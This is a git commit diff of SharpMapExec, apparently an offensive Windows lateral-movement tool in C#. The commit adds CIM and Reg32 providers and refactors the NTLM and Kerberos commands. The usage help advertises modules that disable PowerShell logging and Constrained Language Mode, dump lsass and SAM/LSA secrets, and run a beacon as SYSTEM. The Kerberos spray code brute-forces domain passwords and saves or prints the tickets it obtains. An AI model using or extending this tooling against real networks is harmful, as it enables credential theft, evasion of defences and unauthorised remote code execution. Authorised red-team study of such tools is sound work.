STRLCPY/SharpMapExec

Cim & Reg32 providers added, code cleanup, added stdin pipe for /system & and /delegwalk
cube0x0 committed 3 years ago

c3a8e0ba

1 parent 217d1c54

.vs/SharpMapExec/v16/.suo

Binary file.

■ ■ ■ ■ ■ ■

SharpMapExec/Args/CommandCollection.cs

		skipped 19 lines
20	20		_availableCommands.Add(kerbspray.CommandName, () => new kerbspray());
21	21		_availableCommands.Add(kerberosSmb.CommandName, () => new kerberosSmb());
22	22		_availableCommands.Add(kerberosWinrm.CommandName, () => new kerberosWinrm());
	23	+	_availableCommands.Add(kerberosReg32.CommandName, () => new kerberosReg32());
23	24		_availableCommands.Add(NtlmWinrm.CommandName, () => new NtlmWinrm());
24	25		_availableCommands.Add(NtlmSmb.CommandName, () => new NtlmSmb());
	26	+	_availableCommands.Add(NtlmCim.CommandName, () => new NtlmCim());
	27	+	_availableCommands.Add(NtlmReg32.CommandName, () => new NtlmReg32());
25	28		}
26	29
27	30		public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)
		skipped 18 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Args/Info.cs

		skipped 7 lines
8	8		{
9	9		Console.WriteLine("\r\n SharpMapExec.exe\r\n usage:");
10	10
11		-	//smb
	11	+	//Cim
	12	+	Console.WriteLine("\r\n --- Cim ---");
	13	+	Console.WriteLine(@" SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET");
	14	+	Console.WriteLine("\n Available Cim modules");
	15	+	Console.WriteLine(@" /m:enable_winrm (Runs Enable-PSRemoting -Force)");
	16	+	Console.WriteLine(@" /m:disable_winrm (Runs Disable-PSRemoting -Force)");
	17	+	Console.WriteLine(@" /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)");
	18	+	Console.WriteLine(@" /m:disable_pslogging (Modify registry to disable PowerShell Logging)");
	19	+	Console.WriteLine(@" /m:check_pslockdown (Check __PSLockdownPolicy registry)");
	20	+	Console.WriteLine(@" /m:check_pslogging (Check PowerShell Logging registry)");
	21	+
	22	+	//Reg32
	23	+	Console.WriteLine("\r\n --- Reg32 ---");
	24	+	Console.WriteLine(@" SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET");
	25	+	Console.WriteLine(@" SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC \| /ticket:TICKET.Kirbi> /computername:TARGET");
	26	+	Console.WriteLine("\n Reg32 modules");
	27	+	Console.WriteLine(@" /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)");
	28	+	Console.WriteLine(@" /m:disable_pslogging (Modify registry to disable PowerShell Logging)");
	29	+	Console.WriteLine(@" /m:check_pslockdown (Check __PSLockdownPolicy registry)");
	30	+	Console.WriteLine(@" /m:check_pslogging (Check PowerShell Logging registry)");
	31	+
	32	+	//Smb
12	33		Console.WriteLine("\r\n --- Smb ---");
13	34		Console.WriteLine(@" SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET");
14	35		Console.WriteLine(@" SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC \| /ticket:TICKET.Kirbi> /computername:TARGET");
15		-	Console.WriteLine("\n Available Smb modules");
16		-	Console.WriteLine(@" /m:shares");
	36	+	Console.WriteLine("\n Smb modules");
	37	+	Console.WriteLine(@" /m:shares (Scan for accessible Smb shares)");
17	38
18	39		//WinRm
19	40		Console.WriteLine("\r\n --- WinRm ---");
20	41		Console.WriteLine(@" SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET ");
21	42		Console.WriteLine(@" SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC \| /ticket:TICKET.Kirbi> /computername:TARGET");
22		-	Console.WriteLine("\n Available WinRm modules");
	43	+	Console.WriteLine("\n WinRm modules");
23	44		Console.WriteLine(@" /m:exec /a:whoami (Invoke-Command)");
24	45		Console.WriteLine(@" /m:exec /a:C:\beacon.exe /system (Invoke-Command as System)");
25		-	Console.WriteLine(@" /m:comsvcs (Dump Lsass Process)");
	46	+	Console.WriteLine(@" /m:comsvcs (Dump & parse lsass)");
26	47		Console.WriteLine(@" /m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)");
27		-	Console.WriteLine(@" /m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)");
28		-	Console.WriteLine(@" /m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)");
29		-	Console.WriteLine(@" /m:download /path:C:\file /destination:file (Download File from Host)");
	48	+	Console.WriteLine(@" /m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)");
	49	+	Console.WriteLine(@" /m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)");
	50	+	Console.WriteLine(@" /m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)");
	51	+	Console.WriteLine(@" /m:download /path:C:\file /destination:file (Download file from host)");
	52	+	Console.WriteLine(@" /m:upload /path:C:\file /destination:file (Upload file to host)");
30	53
31	54		//domain
32	55		Console.WriteLine("\r\n --- Domain ---");
		skipped 7 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/KerberosSpray.cs

		skipped 35 lines
36	36
37	37		public void Execute(Dictionary<string, string> arguments)
38	38		{
	39	+	Console.WriteLine("\r\n[*] Action: Perform Kerberos Brute Force\r\n");
39	40		try
40	41		{
41	42		this.ParseArguments(arguments);
		skipped 95 lines
137	138
138	139		this.credPassword = arguments["/credpassword"];
139	140		}
	141	+
140	142		}
141	143
142	144		private void ParsePasswords(Dictionary<string, string> arguments)
		skipped 80 lines
223	225
224	226		private string[] DomainUsernames()
225	227		{
	228	+
226	229		string domainController = this.DomainController();
227	230		string bindPath = this.BindPath(domainController);
228	231		DirectoryEntry directoryObject = new DirectoryEntry(bindPath);
		skipped 12 lines
241	244
242	245		Console.WriteLine("[*] Using alternate creds : {0}\r\n", userDomain);
243	246		}
	247	+
244	248
245	249		DirectorySearcher userSearcher = new DirectorySearcher(directoryObject);
246	250		userSearcher.Filter = "(samAccountType=805306368)";
		skipped 35 lines
282	286		{
283	287		string domainController = null;
284	288
	289	+
285	290		if (String.IsNullOrEmpty(this.dc))
286	291		{
287	292		domainController = Networking.GetDCName();
		skipped 36 lines
324	329		return pc.ValidateCredentials(this.credUser, this.credPassword);
325	330		}
326	331		}
	332	+
327	333		}
	334	+
328	335
329	336		public class BruteforceConsoleReporter : IBruteforcerReporter
330	337		{
	338	+
331	339		private uint verbose;
332	340		private string passwordsOutfile;
333	341		private bool saveTicket;
		skipped 6 lines
340	348		this.saveTicket = saveTicket;
341	349		}
342	350
343		-	public void ReportValidPassword(string domain, string username, string password, byte[] ticket)
	351	+	public void ReportValidPassword(string domain, string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE)
344	352		{
345		-	Console.WriteLine("[+] STUPENDOUS => {0}:{1}", username, password);
346	353		this.WriteUserPasswordToFile(username, password);
347		-	string ticketFilename = username + ".kirbi";
348		-	File.WriteAllBytes(ticketFilename, ticket);
349		-	Console.WriteLine("[*] Saved TGT into {0}", ticketFilename);
	354	+	if (ticket != null)
	355	+	{
	356	+	Console.WriteLine("[+] STUPENDOUS => {0}:{1}", username, password);
	357	+	this.HandleTicket(username, ticket);
	358	+	}
	359	+	else
	360	+	{
	361	+	Console.WriteLine("[+] UNLUCKY => {0}:{1} ({2})", username, password, err);
	362	+	}
350	363		}
351	364
352	365		public void ReportValidUser(string domain, string username)
		skipped 23 lines
376	389		krbError.error_code, (Interop.KERBEROS_ERROR)krbError.error_code);
377	390		}
378	391
	392	+
379	393		private void WriteUserPasswordToFile(string username, string password)
380	394		{
381	395		if (String.IsNullOrEmpty(this.passwordsOutfile))
		skipped 15 lines
397	411		}
398	412		}
399	413		}
	414	+
	415	+	private void HandleTicket(string username, byte[] ticket)
	416	+	{
	417	+	if (this.saveTicket)
	418	+	{
	419	+	string ticketFilename = username + ".kirbi";
	420	+	File.WriteAllBytes(ticketFilename, ticket);
	421	+	Console.WriteLine("[*] Saved TGT into {0}", ticketFilename);
	422	+	}
	423	+	else
	424	+	{
	425	+	this.PrintTicketBase64(username, ticket);
	426	+	}
	427	+	}
	428	+
	429	+	private void PrintTicketBase64(string ticketname, byte[] ticket)
	430	+	{
	431	+	string ticketB64 = Convert.ToBase64String(ticket);
	432	+
	433	+	Console.WriteLine("[*] base64({0}.kirbi):\r\n", ticketname);
	434	+
	435	+	// display in columns of 80 chararacters
	436	+	Console.WriteLine(" {0}", ticketB64);
	437	+
	438	+	Console.WriteLine("\r\n", ticketname);
	439	+	}
	440	+
400	441		}
401	442		}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmCim.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.IO;
4	+	using static SharpMapExec.Helpers.SecurityContext;
5	+
6	+	namespace SharpMapExec.Commands
7	+	{
8	+	public class NtlmCim : ICommand
9	+	{
10	+	public static string CommandName => "ntlmcim";
11	+
12	+	public void Execute(Dictionary<string, string> arguments)
13	+	{
14	+	string[] user;
15	+	string domain = "";
16	+	string path = "";
17	+	string destination = "";
18	+	string[] computernames;
19	+	var hash = new NTHash();
20	+	var password = new ClearText();
21	+	string module = "";
22	+	string moduleargument = "";
23	+	List<string> flags = new List<string>();
24	+
25	+	if (arguments.ContainsKey("/module"))
26	+	{
27	+	module = arguments["/module"];
28	+	}
29	+	if (arguments.ContainsKey("/m"))
30	+	{
31	+	module = arguments["/m"];
32	+	}
33	+	if (arguments.ContainsKey("/impersonate") \|\| arguments.ContainsKey("/imprs"))
34	+	{
35	+	flags.Add("impersonate");
36	+	}
37	+
38	+
39	+	//
40	+	if (arguments.ContainsKey("/domain"))
41	+	{
42	+	domain = arguments["/domain"];
43	+	}
44	+	else
45	+	{
46	+	domain = ".";
47	+	}
48	+
49	+	if (arguments.ContainsKey("/user"))
50	+	{
51	+	if (File.Exists(arguments["/user"]))
52	+	{
53	+	user = File.ReadAllLines(arguments["/user"]);
54	+	}
55	+	else
56	+	{
57	+	string[] parts = arguments["/user"].Split('\\');
58	+	if (parts.Length == 2)
59	+	{
60	+	domain = parts[0];
61	+	user = parts[1].Split(',');
62	+	}
63	+	else
64	+	{
65	+	user = arguments["/user"].Split(',');
66	+	}
67	+	}
68	+	}
69	+	else
70	+	{
71	+	Console.WriteLine("[-] /user must be supplied!");
72	+	return;
73	+	}
74	+
75	+	if (arguments.ContainsKey("/computername"))
76	+	{
77	+	if (File.Exists(arguments["/computername"]))
78	+	{
79	+	computernames = File.ReadAllLines(arguments["/computername"]);
80	+	}
81	+	else
82	+	{
83	+	computernames = arguments["/computername"].Split(',');
84	+	}
85	+	}
86	+	else
87	+	{
88	+	Console.WriteLine("[-] /computername must be supplied!");
89	+	return;
90	+	}
91	+
92	+	if (arguments.ContainsKey("/password"))
93	+	{
94	+	if (File.Exists(arguments["/password"]))
95	+	{
96	+	password.Cleartext = File.ReadAllLines(arguments["/password"]);
97	+	}
98	+	else
99	+	{
100	+	password.Cleartext = arguments["/password"].Split(',');
101	+	}
102	+	}
103	+	else if (arguments.ContainsKey("/ntlm"))
104	+	{
105	+	if (File.Exists(arguments["/ntlm"]))
106	+	{
107	+	hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
108	+	}
109	+	else
110	+	{
111	+	hash.Nthash = arguments["/ntlm"].Split(',');
112	+	}
113	+	}
114	+	else
115	+	{
116	+	Console.WriteLine("[-] /password or /ntlm must be supplied");
117	+	return;
118	+	}
119	+	if (module.Contains("exec") && moduleargument.Length == 0)
120	+	{
121	+	Console.WriteLine("[-] Missing exec argument");
122	+	return;
123	+	}
124	+	if (module.Contains("assembly") && !File.Exists(path))
125	+	{
126	+	Console.WriteLine("[-] Missing assembly path");
127	+	return;
128	+	}
129	+	if (module.Contains("download") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
130	+	{
131	+	Console.WriteLine("[-] Need path and destination");
132	+	return;
133	+	}
134	+	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
135	+	{
136	+	Console.WriteLine("[-] Need path and destination");
137	+	return;
138	+	}
139	+
140	+	if (password.Cleartext != null)
141	+	{
142	+	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "cim");
143	+	}
144	+	else
145	+	{
146	+	Console.WriteLine("[-] Need clear-text password for cim");
147	+	return;
148	+	}
149	+	}
150	+	}
151	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmReg32.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.IO;
4	+	using static SharpMapExec.Helpers.SecurityContext;
5	+
6	+	namespace SharpMapExec.Commands
7	+	{
8	+	public class NtlmReg32 : ICommand
9	+	{
10	+	public static string CommandName => "ntlmreg32";
11	+
12	+	public void Execute(Dictionary<string, string> arguments)
13	+	{
14	+	string[] user;
15	+	string domain = "";
16	+	string path = "";
17	+	string destination = "";
18	+	string[] computernames;
19	+	var hash = new NTHash();
20	+	var password = new ClearText();
21	+	string module = "";
22	+	string moduleargument = "";
23	+	List<string> flags = new List<string>();
24	+
25	+	if (arguments.ContainsKey("/module"))
26	+	{
27	+	module = arguments["/module"];
28	+	}
29	+	if (arguments.ContainsKey("/m"))
30	+	{
31	+	module = arguments["/m"];
32	+	}
33	+
34	+	//
35	+	if (arguments.ContainsKey("/domain"))
36	+	{
37	+	domain = arguments["/domain"];
38	+	}
39	+	else
40	+	{
41	+	domain = ".";
42	+	}
43	+
44	+	if (arguments.ContainsKey("/user"))
45	+	{
46	+	if (File.Exists(arguments["/user"]))
47	+	{
48	+	user = File.ReadAllLines(arguments["/user"]);
49	+	}
50	+	else
51	+	{
52	+	string[] parts = arguments["/user"].Split('\\');
53	+	if (parts.Length == 2)
54	+	{
55	+	domain = parts[0];
56	+	user = parts[1].Split(',');
57	+	}
58	+	else
59	+	{
60	+	user = arguments["/user"].Split(',');
61	+	}
62	+	}
63	+	}
64	+	else
65	+	{
66	+	Console.WriteLine("[-] /user must be supplied!");
67	+	return;
68	+	}
69	+
70	+	if (arguments.ContainsKey("/computername"))
71	+	{
72	+	if (File.Exists(arguments["/computername"]))
73	+	{
74	+	computernames = File.ReadAllLines(arguments["/computername"]);
75	+	}
76	+	else
77	+	{
78	+	computernames = arguments["/computername"].Split(',');
79	+	}
80	+	}
81	+	else
82	+	{
83	+	Console.WriteLine("[-] /computername must be supplied!");
84	+	return;
85	+	}
86	+
87	+	if (arguments.ContainsKey("/password"))
88	+	{
89	+	if (File.Exists(arguments["/password"]))
90	+	{
91	+	password.Cleartext = File.ReadAllLines(arguments["/password"]);
92	+	}
93	+	else
94	+	{
95	+	password.Cleartext = arguments["/password"].Split(',');
96	+	}
97	+	}
98	+	else if (arguments.ContainsKey("/ntlm"))
99	+	{
100	+	if (File.Exists(arguments["/ntlm"]))
101	+	{
102	+	hash.Nthash = File.ReadAllLines(arguments["/ntlm"]);
103	+	}
104	+	else
105	+	{
106	+	hash.Nthash = arguments["/ntlm"].Split(',');
107	+	}
108	+	}
109	+	else
110	+	{
111	+	Console.WriteLine("[-] /password or /ntlm must be supplied");
112	+	return;
113	+	}
114	+	if (module.Contains("exec") && moduleargument.Length == 0)
115	+	{
116	+	Console.WriteLine("[-] Missing exec argument");
117	+	return;
118	+	}
119	+	if (module.Contains("assembly") && !File.Exists(path))
120	+	{
121	+	Console.WriteLine("[-] Missing assembly path");
122	+	return;
123	+	}
124	+	if (module.Contains("download") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
125	+	{
126	+	Console.WriteLine("[-] Need path and destination");
127	+	return;
128	+	}
129	+	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
130	+	{
131	+	Console.WriteLine("[-] Need path and destination");
132	+	return;
133	+	}
134	+
135	+	if (password.Cleartext != null)
136	+	{
137	+	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "reg32");
138	+	}
139	+	else
140	+	{
141	+	Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, path, destination, flags, "reg32");
142	+	}
143	+	}
144	+	}
145	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmSmb.cs

		skipped 1 lines
2	2		using System.Collections.Generic;
3	3		using System.IO;
4	4		using static SharpMapExec.Helpers.SecurityContext;
5		-	using static SharpMapExec.Lib.ntlmsmb;
6	5
7	6		namespace SharpMapExec.Commands
8	7		{
		skipped 29 lines
38	37		moduleargument = arguments["/argument"];
39	38		}
40	39
	40	+
	41	+	//
41	42		if (arguments.ContainsKey("/domain"))
42	43		{
43	44		domain = arguments["/domain"];
		skipped 75 lines
119	120		}
120	121		if (password.Cleartext != null)
121	122		{
122		-	NtlmSmb(user, domain, password, computernames, module, moduleargument);
	123	+	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, "", "", flags, "smb");
123	124		}
124	125		else
125	126		{
126		-	NtlmSmb(user, domain, hash, computernames, module, moduleargument);
	127	+	Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, "", "", flags, "smb");
127	128		}
128	129		}
129	130		}
		skipped 1 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/NtlmWinrm.cs

		skipped 1 lines
2	2		using System.Collections.Generic;
3	3		using System.IO;
4	4		using static SharpMapExec.Helpers.SecurityContext;
5		-	using static SharpMapExec.Lib.ntlmwinrm;
6	5
7	6		namespace SharpMapExec.Commands
8	7		{
		skipped 54 lines
63	62		{
64	63		flags.Add("delegwalk");
65	64		}
	65	+	if (module.Contains("exec") && moduleargument.Length == 0)
	66	+	{
	67	+	Console.WriteLine("[-] Missing exec argument");
	68	+	return;
	69	+	}
	70	+	if (module.Contains("assembly") && !File.Exists(path))
	71	+	{
	72	+	Console.WriteLine("[-] Missing assembly path");
	73	+	return;
	74	+	}
	75	+	if (module.Contains("download") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
	76	+	{
	77	+	Console.WriteLine("[-] Need path and destination");
	78	+	return;
	79	+	}
	80	+	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
	81	+	{
	82	+	Console.WriteLine("[-] Need path and destination");
	83	+	return;
	84	+	}
66	85
	86	+
	87	+	//
67	88		if (arguments.ContainsKey("/domain"))
68	89		{
69	90		domain = arguments["/domain"];
		skipped 73 lines
143	164		Console.WriteLine("[-] /password or /ntlm must be supplied");
144	165		return;
145	166		}
	167	+
	168	+
146	169		if (password.Cleartext != null)
147	170		{
148		-	NtlmWinRm(user, domain, password, computernames, module, moduleargument, path, destination, flags);
	171	+	Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "winrm");
149	172		}
150	173		else
151	174		{
152		-	NtlmWinRm(user, domain, hash, computernames, module, moduleargument, path, destination, flags);
	175	+	Lib.ntlm.Ntlm(user, domain, hash, computernames, module, moduleargument, path, destination, flags, "winrm");
153	176		}
154	177		}
155	178		}
		skipped 1 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/kerberosReg32.cs

1	+	using Rubeus;
2	+	using System;
3	+	using System.Collections.Generic;
4	+	using System.IO;
5	+
6	+	namespace SharpMapExec.Commands
7	+	{
8	+	public class kerberosReg32 : ICommand
9	+	{
10	+	public static string CommandName => "kerberosreg32";
11	+
12	+	public void Execute(Dictionary<string, string> arguments)
13	+	{
14	+	string[] users = { };
15	+	string domain = "";
16	+	string[] passwords = { };
17	+	string[] hashes = { };
18	+	string dc = "";
19	+	string ticket = "";
20	+	Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
21	+	string[] computernames;
22	+	string module = "";
23	+	string moduleargument = "";
24	+	List<string> flags = new List<string>();
25	+
26	+	if (arguments.ContainsKey("/module"))
27	+	{
28	+	module = arguments["/module"];
29	+	}
30	+	if (arguments.ContainsKey("/m"))
31	+	{
32	+	module = arguments["/m"];
33	+	}
34	+
35	+
36	+	//
37	+	if (arguments.ContainsKey("/user"))
38	+	{
39	+	if (File.Exists(arguments["/user"]))
40	+	{
41	+	users = File.ReadAllLines(arguments["/user"]);
42	+	}
43	+	else
44	+	{
45	+	string[] parts = arguments["/user"].Split('\\');
46	+	if (parts.Length == 2)
47	+	{
48	+	domain = parts[0];
49	+	users = parts[1].Split(',');
50	+	}
51	+	else
52	+	{
53	+	users = arguments["/user"].Split(',');
54	+	}
55	+	}
56	+	}
57	+
58	+	if (arguments.ContainsKey("/domain"))
59	+	{
60	+	domain = arguments["/domain"];
61	+	}
62	+	if (arguments.ContainsKey("/dc"))
63	+	{
64	+	dc = arguments["/dc"];
65	+	}
66	+	if (arguments.ContainsKey("/ticket"))
67	+	{
68	+	ticket = arguments["/ticket"];
69	+	}
70	+
71	+	if (arguments.ContainsKey("/computername"))
72	+	{
73	+	if (File.Exists(arguments["/computername"]))
74	+	{
75	+	computernames = File.ReadAllLines(arguments["/computername"]);
76	+	}
77	+	else
78	+	{
79	+	computernames = arguments["/computername"].Split(',');
80	+	}
81	+	}
82	+	else
83	+	{
84	+	Console.WriteLine("[-] /computername must be supplied!");
85	+	return;
86	+	}
87	+
88	+	if (arguments.ContainsKey("/encType"))
89	+	{
90	+	string encTypeString = encType.ToString().ToUpper();
91	+
92	+	if (encTypeString.Equals("RC4") \|\| encTypeString.Equals("NTLM"))
93	+	{
94	+	encType = Interop.KERB_ETYPE.rc4_hmac;
95	+	}
96	+	else if (encTypeString.Equals("AES128"))
97	+	{
98	+	encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
99	+	}
100	+	else if (encTypeString.Equals("AES256") \|\| encTypeString.Equals("AES"))
101	+	{
102	+	encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
103	+	}
104	+	else if (encTypeString.Equals("DES"))
105	+	{
106	+	encType = Interop.KERB_ETYPE.des_cbc_md5;
107	+	}
108	+	}
109	+	else
110	+	encType = Interop.KERB_ETYPE.rc4_hmac;
111	+
112	+	if (arguments.ContainsKey("/password"))
113	+	{
114	+	if (File.Exists(arguments["/password"]))
115	+	passwords = File.ReadAllLines(arguments["/password"]);
116	+	else
117	+	passwords = arguments["/password"].Split(',');
118	+	}
119	+	else if (arguments.ContainsKey("/des"))
120	+	{
121	+	if (File.Exists(arguments["/des"]))
122	+	hashes = File.ReadAllLines(arguments["/des"]);
123	+	else
124	+	hashes = arguments["/des"].Split(',');
125	+	encType = Interop.KERB_ETYPE.des_cbc_md5;
126	+	}
127	+	else if (arguments.ContainsKey("/rc4"))
128	+	{
129	+	if (File.Exists(arguments["/rc4"]))
130	+	hashes = File.ReadAllLines(arguments["/rc4"]);
131	+	else
132	+	hashes = arguments["/rc4"].Split(',');
133	+	encType = Interop.KERB_ETYPE.rc4_hmac;
134	+	}
135	+	else if (arguments.ContainsKey("/ntlm"))
136	+	{
137	+	if (File.Exists(arguments["/ntlm"]))
138	+	hashes = File.ReadAllLines(arguments["/ntlm"]);
139	+	else
140	+	hashes = arguments["/ntlm"].Split(',');
141	+	encType = Interop.KERB_ETYPE.rc4_hmac;
142	+	}
143	+	else if (arguments.ContainsKey("/aes128"))
144	+	{
145	+	hashes = arguments["/aes128"].Split(',');
146	+	encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
147	+	}
148	+	else if (arguments.ContainsKey("/aes256"))
149	+	{
150	+	hashes = arguments["/aes256"].Split(',');
151	+	encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
152	+	}
153	+
154	+	if (users.Length == 0 && String.IsNullOrEmpty(ticket))
155	+	{
156	+	Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
157	+	return;
158	+	}
159	+	if (String.IsNullOrEmpty(domain) && String.IsNullOrEmpty(ticket))
160	+	{
161	+	Console.WriteLine("\r\n[X] You must supply a domain!\r\n");
162	+	return;
163	+	}
164	+
165	+	if ((hashes.Length == 0 && passwords.Length == 0) && String.IsNullOrEmpty(ticket))
166	+	{
167	+	Console.WriteLine("\r\n[X] You must supply a /password , or a [/des\|/rc4\|/aes128\|/aes256] hash!\r\n");
168	+	return;
169	+	}
170	+
171	+	if (String.IsNullOrEmpty(ticket) && (!((encType == Interop.KERB_ETYPE.des_cbc_md5) \|\| (encType == Interop.KERB_ETYPE.rc4_hmac) \|\| (encType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1) \|\| (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1))))
172	+	{
173	+	Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
174	+	return;
175	+	}
176	+
177	+	Lib.kerberos.Kerberos(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, "", "", flags, "reg32");
178	+	}
179	+	}
180	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Commands/kerberosSmb.cs

		skipped 1 lines
2	2		using System;
3	3		using System.Collections.Generic;
4	4		using System.IO;
5		-	using static SharpMapExec.Lib.kerberossmb;
6	5
7	6		namespace SharpMapExec.Commands
8	7		{
		skipped 32 lines
41	40		moduleargument = arguments["/argument"];
42	41		}
43	42
	43	+
	44	+	//
44	45		if (arguments.ContainsKey("/user"))
45	46		{
46	47		if (File.Exists(arguments["/user"]))
		skipped 133 lines
180	181		Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
181	182		return;
182	183		}
183		-	KerberosSmb(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, flags);
	184	+
	185	+	Lib.kerberos.Kerberos(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, "", "", flags, "smb");
184	186		}
185	187		}
186	188		}

■ ■ ■ ■ ■ ■ ■

SharpMapExec/Commands/kerberosWinrm.cs

		skipped 1 lines
2	2		using System;
3	3		using System.Collections.Generic;
4	4		using System.IO;
5		-	using static SharpMapExec.Lib.kerberoswinrm;
6	5
7	6		namespace SharpMapExec.Commands
8	7		{
		skipped 57 lines
66	65		{
67	66		flags.Add("delegwalk");
68	67		}
	68	+	if (module.Contains("exec") && moduleargument.Length == 0)
	69	+	{
	70	+	Console.WriteLine("[-] Missing exec argument");
	71	+	return;
	72	+	}
	73	+	if (module.Contains("assembly") && !File.Exists(path))
	74	+	{
	75	+	Console.WriteLine("[-] Missing assembly path");
	76	+	return;
	77	+	}
	78	+	if (module.Contains("download") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
	79	+	{
	80	+	Console.WriteLine("[-] Need path and destination");
	81	+	return;
	82	+	}
	83	+	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
	84	+	{
	85	+	Console.WriteLine("[-] Need path and destination");
	86	+	return;
	87	+	}
69	88
	89	+
	90	+	//
70	91		if (arguments.ContainsKey("/user"))
71	92		{
72	93		if (File.Exists(arguments["/user"]))
		skipped 134 lines
207	228		return;
208	229		}
209	230
210		-	KerberosWinRm(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags);
	231	+	Lib.kerberos.Kerberos(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, "winrm");
211	232		}
212	233		}
213	234		}

■ ■ ■ ■ ■ ■

SharpMapExec/Helpers/Misc.cs

		skipped 2 lines
3	3		using System.IO.Compression;
4	4		using System.Linq;
5	5		using System.Net.Sockets;
	6	+	using System.Security;
6	7		using System.Text;
7	8
8	9		namespace SharpMapExec.Helpers
		skipped 21 lines
30	31		return resultStream.ToArray();
31	32		}
32	33		}
	34	+
33	35		public static bool CheckHostPort(string hostname, int port, int PortScanTimeout = 2000)
34	36		{
35	37		using (var client = new TcpClient())
		skipped 44 lines
80	82		.Where(x => x % 2 == 0)
81	83		.Select(x => Convert.ToByte(hex.Substring(x, 2), 16))
82	84		.ToArray();
	85	+	}
	86	+
	87	+	public static SecureString CreateSecuredString(string pw)
	88	+	{
	89	+	SecureString secureString = new SecureString();
	90	+	if (string.IsNullOrEmpty(pw))
	91	+	return null;
	92	+	foreach (char c in pw)
	93	+	secureString.AppendChar(c);
	94	+	return secureString;
83	95		}
84	96		}
85	97		}

■ ■ ■ ■ ■ ■

SharpMapExec/Helpers/PsFunction.cs

		skipped 77 lines
78	78
79	79		public static string RunAsSystem(string command)
80	80		{
81		-	//string csFile = Lib.Wsman.Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\System.cs"));
